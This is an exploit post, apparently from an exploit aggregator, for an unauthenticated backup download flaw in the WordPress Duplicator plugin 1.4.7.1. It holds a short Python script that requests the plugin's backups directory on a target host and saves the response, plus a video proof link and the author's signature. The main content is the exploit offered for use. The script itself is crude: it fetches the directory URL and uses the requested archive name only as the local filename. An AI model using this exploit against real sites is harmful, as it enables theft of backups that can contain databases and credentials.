Share
## https://sploitus.com/exploit?id=PACKETSTORM:167994
## Title: WordPress Plugin Duplicator 1.4.7.1 - Unauthenticated Backup Download  
## Author: nu11secur1ty  
## Date: 08.08.2022  
## Vendor: https://wordpress.org/  
## Software: https://wordpress.org/plugins/duplicator/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1  
  
  
  
## Description:  
The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated  
Backup Download, after an update from the 1.4.7 version.  
The attacker can download all archive information from the system by  
using this vulnerability!  
  
Status: CRITICAL  
  
[+] Exploit:  
  
```python  
#!/usr/bin/python  
# Author nu11secur1ty  
import requests  
import time  
  
vulnerableURL = "http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"  
archive=input("Give the name of the archive...\n")  
response = requests.get(vulnerableURL)  
time.sleep(5)  
open(archive, "wb").write(response.content)  
print("Right now, you just downloaded the secret archive =)\n")  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1)  
  
## Proof and Exploit:  
[href](https://streamable.com/ee11bg)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>